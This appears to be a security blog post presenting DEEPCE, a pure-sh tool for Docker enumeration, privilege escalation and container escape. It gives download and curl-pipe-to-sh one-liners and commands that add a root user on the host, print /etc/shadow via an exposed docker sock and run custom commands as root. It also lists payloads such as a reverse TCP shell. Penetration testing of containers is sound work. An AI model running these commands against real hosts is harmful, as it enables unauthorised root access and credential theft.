Cyber security

DEEPCE – Docker’s Ultimate Security Toolkit

Tailored for professionals who seek to elevate their Docker container security game, this powerful suite offers advanced enumeration, privilege escalation, and container escape functionalities.

Designed with utmost compatibility in mind, DEEPCE operates in pure sh, ensuring it seamlessly integrates into any container environment.

                      ##         .
                ## ## ##        ==
             ## ## ## ##       ===
         /"""""""""""""""""\___/ ===
    ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ /  ===- ~~~
         \______ X           __/
           \    \         __/
            \____\_______/
          __                        
     ____/ /__  ___  ____  ________ 
    / __  / _ \/ _ \/ __ \/ ___/ _ \   ENUMERATE
   / /_/ /  __/  __/ /_/ / (__/  __/  ESCALATE
   \__,_/\___/\___/ .___/\___/\___/  ESCAPE
                 /_/

Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)

In order for it to be compatible with the maximum number of containers, DEEPCE is written in pure sh with no dependencies.

It will make use of additional tools such as curl, nmap, nslookup and dig if available, but for the most part is not reliant upon them for enumeration.

None of the enumeration should touch the disk, however most of the exploits create new containers which will cause disk writes, and some exploits will overwrite runC which can be destructive, so be careful!

Please see below for a list of the enumerations, exploits and payloads DEEPCE can use. If you have ideas for anymore please submit an issue in github!

Downloading

DEEPCE can be downloaded onto a host or container using one of the following one-liners. Tip: download to /dev/shm to avoid touching the disk.

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh  

Screenshots

For more please view the docs folder

Enumerations

The following is the list of enumerations performed by DEEPCE.

  • Container ID & name (via reverse dns)
  • Container IP / DNS Server
  • Docker Version
  • Interesting mounts
  • Passwords in common files
  • Environment variables
  • Password hashes
  • Common sensitive files stored in containers
  • Other containers on same network
  • Port scan other containers, and the host machine itself
  • Find exposed docker sock

Exploits

  • Docker Group Privilege Escalation
  • Privileged mode host command execution
  • Exposed Docker Sock

Payloads

For each of the exploits above payloads can be defined in order to exploit the host system. These include:

  • Reverse TCP shell
  • Print /etc/shadow
  • Add new root user
  • Run custom commands
  • Run custom payload binaries

Examples

# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh 

Exploits

The following examples show the different kinds of exploits that can be performed and the avaliable payloads.

  • Exploit a privileged container to create a new root user on the host operating system:
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

Exploit a writable docker sock file in order to print the contents of /etc/shadow

./deepce.sh --no-enumeration --exploit SOCK --shadow

Escalate to root via membership to the docker group on a host and run a custom payload

./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"

Advanced Usage

It is possible to download and run deepce without touching the disk, however you will be unable to easily set arguments (direct manipulation of variables is possible using export).

wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Install Python 3.7 on Ubuntu 18.04: apt and Source Build Methods

Python 3.7 was a significant release for the language. It introduced data classes, a decorator that automatically…

11 hours ago

Install Odoo 13 on Ubuntu 18.04: Python Venv and Nginx Guide

Odoo is a popular open-source suite of business applications. A single platform covers CRM, e-commerce, accounting,…

11 hours ago

Secure Apache with Let’s Encrypt on Ubuntu 18.04: Free SSL Guide

Let's Encrypt is a free, automated certificate authority run by the Internet Security Research Group…

11 hours ago

Install GCC on Ubuntu 18.04: C and C++ Compiler Setup Guide

GCC (GNU Compiler Collection) is a set of compilers and development libraries for C, C++, Fortran,…

11 hours ago

Install Python 3.8 on Ubuntu 18.04: apt and Source Build Methods

Python is one of the most widely used programming languages in the world. Its clean, readable…

11 hours ago

Install Tomcat 9 on Ubuntu 18.04: Systemd Service Setup Guide

Apache Tomcat is an open-source Java application server that implements the Java Servlet, JavaServer Pages, and…

1 day ago